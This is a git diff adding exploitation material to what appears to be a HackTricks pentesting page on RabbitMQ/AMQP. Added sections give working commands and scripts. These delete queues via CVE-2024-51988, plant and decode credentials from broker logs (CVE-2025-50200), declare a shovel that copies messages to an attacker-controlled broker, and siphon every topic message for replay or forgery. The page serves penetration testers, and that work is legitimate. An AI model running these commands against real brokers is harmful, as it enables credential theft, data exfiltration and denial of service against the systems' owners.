Merge pull request #1699 from HackTricks-wiki/research_update_src_network-services-pentesting_5671-5672-pentesting-amqp_20251220_013837

carlospolop · web-flow · commit a2b1c877cb68 · 2025-12-25T22:07:59.000+01:00
Research Update Enhanced src/network-services-pentesting/567...
diff --git a/src/network-services-pentesting/5671-5672-pentesting-amqp.md b/src/network-services-pentesting/5671-5672-pentesting-amqp.md
@@ -17,19 +17,25 @@ PORT     STATE SERVICE VERSION
 5672/tcp open  amqp    RabbitMQ 3.1.5 (0-9)
 ```
 
+- **Default credentials**: `guest:guest`. RabbitMQ restricts them to localhost through `loopback_users`, but many Docker/IoT images disable that check, so always test remote login before assuming it is blocked.
+- **Authentication mechanisms**: PLAIN and AMQPLAIN are enabled by default, ANONYMOUS is mapped to `anonymous_login_user`/`anonymous_login_pass`, and EXTERNAL (x509) can be exposed when TLS is enabled. Enumerate what the broker advertises so you know whether to try password spraying or certificate impersonation later.
+
 ## Enumeration
 
 ### Manual
 
 ```python
 import amqp
-#By default it uses default credentials "guest":"guest"
+# By default it uses "guest":"guest"
 conn = amqp.connection.Connection(host="IP", port=5672, virtual_host="/")
 conn.connect()
+print("SASL mechanisms:", conn.mechanisms)
 for k, v in conn.server_properties.items():
     print(k, v)
 ```
 
+Once authenticated, dump `conn.server_properties`, `conn.channel_max` and `conn.frame_max` to understand throughput limits and whether you can exhaust resources with oversized frames.
+
 ### Automatic
 
 ```bash
@@ -52,11 +58,87 @@ PORT     STATE SERVICE VERSION
 |_  locales: en_US
 ```
 
+### TLS/SASL checks
+
+- **Probe AMQPS**:
+  ```bash
+  openssl s_client -alpn amqp -connect IP:5671 -tls1_3 -msg </dev/null
+  ```
+  This leaks the certificate chain, supported TLS versions and whether mutual TLS is required.
+- **List listeners** without creds:
+  ```bash
+  rabbitmq-diagnostics -q listeners
+  ```
+  Useful once you get low-priv shell access to the host.
+- **Spot ANONYMOUS logins**: if the broker allows the ANONYMOUS SASL mechanism, try connecting with an empty username/password; RabbitMQ will internally map you to the `anonymous_login_user` (defaults to `guest`).
+
 ### Brute Force
 
 - [**AMQP Protocol Brute-Force**](../generic-hacking/brute-force.md#amqp-activemq-rabbitmq-qpid-joram-and-solace)
 - [**STOMP Protocol Brute-Force**](../generic-hacking/brute-force.md#stomp-activemq-rabbitmq-hornetq-and-openmq)
 
+## Exploitation Tips
+
+### Queue deletion without configure perms (CVE-2024-51988)
+
+RabbitMQ ≤ 3.12.10 (and unpatched Tanzu builds) fail to check the `configure` permission when queues are deleted via the HTTP API. Any authenticated user with access to the target vhost can nuke arbitrary queues even if they only have `read` or `write` rights.
+
+```bash
+# confirm vulnerable version first
+rabbitmqadmin -H target -P 15672 -u user -p pass show overview | grep -i version
+# delete a high-value queue
+curl -k -u user:pass -X DELETE https://target:15672/api/queues/%2F/payments-processing
+```
+
+Combine this with `rabbitmqadmin list permissions` to find vhosts where your low-priv user has partial access, then wipe queues to induce denial of service or trigger compensating controls observed on the AMQP side. Check [15672 pentesting](15672-pentesting-rabbitmq-management.md) for more HTTP API endpoints to chain with this bug.
+
+### Harvest credentials from RabbitMQ logs (CVE-2025-50200)
+
+Until 4.0.8/4.1.0, hitting the management API with HTTP basic auth on a non-existent resource causes the broker to log the entire `Authorization` header (base64). If you gain limited filesystem access (e.g. Docker escape, plugin RCE), search `/var/log/rabbitmq/rabbit@*.log` for `Authorization:` and recover credentials for other tenants or service accounts.
+
+```bash
+curl -k -u pentester:SuperSecret https://target:15672/api/queues/%2f/ghost
+sudo grep -R "Authorization:" /var/log/rabbitmq | cut -d' ' -f3 | base64 -d
+```
+
+Trigger this intentionally with bogus endpoints to plant fresh secrets in the logs, then pivot by reusing the decoded creds over AMQP, STOMP, MQTT or the OS itself.
+
+### Weaponize rabbitmqadmin-ng
+
+`rabbitmqadmin` v2 (aka rabbitmqadmin-ng) is a self-contained CLI that talks to the management API and now ships statically linked builds for Linux/macOS/Windows. Drop it on your bounce box and script:
+
+```bash
+# enumerate live channels and prefetch pressure
+rabbitmqadmin --host target --port 15672 --username user --password pass channels list --non-interactive
+# clone a shovel to exfiltrate messages to attacker-controlled broker
+rabbitmqadmin shovels declare_amqp091 \
+  --name loot \
+  --source-uri amqp://user:pass@target:5672/%2f \
+  --destination-uri amqp://attacker:pw@vps:5672/%2f \
+  --source-queue transactions \
+  --destination-queue stolen
+```
+
+Because the tool supports blue/green aware health checks, you can also abuse `rabbitmqadmin health_check port_listener --port 5672` to remotely confirm whether TLS listeners were exposed or to keep the service busy for timing probes.
+
+### Message hijacking/sniffing
+
+If you find permissive policies (`.*` bindings, `topic` exchanges, or `x-queue-master-locator = min-masters`), you can quietly siphon messages without deleting them:
+
+```python
+import pika
+creds = pika.PlainCredentials('user','pass')
+conn = pika.BlockingConnection(pika.ConnectionParameters('IP', 5672, '/', creds))
+ch = conn.channel()
+ch.queue_declare(queue='loot', exclusive=True, auto_delete=True)
+ch.queue_bind(queue='loot', exchange='amq.topic', routing_key='#')
+for method, props, body in ch.consume('loot', inactivity_timeout=5):
+    if body:
+        print(method.routing_key, body)
+```
+
+Swap the routing key for `audit.#` or `payments.*` to focus on sensitive flows, then republish forged messages by flipping `basic_publish` arguments—handy for replay attacks against downstream microservices.
+
 ## Other RabbitMQ ports
 
 In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**:
@@ -86,8 +168,9 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin
 
 - [CloudAMQP – RabbitMQ for beginners](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html)
 - [RabbitMQ Networking Guide](https://www.rabbitmq.com/networking.html)
+- [RabbitMQ Authentication, Authorisation & Access Control](https://www.rabbitmq.com/docs/access-control)
+- [CVE-2024-51988 – RabbitMQ HTTP API queue deletion bug](https://www.cve.news/cve-2024-51988/)
+- [GHSA-gh3x-4x42-fvq8 – RabbitMQ logs Authorization header](https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-gh3x-4x42-fvq8)
+- [rabbitmqadmin v2 (rabbitmqadmin-ng)](https://github.com/rabbitmq/rabbitmqadmin-ng)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
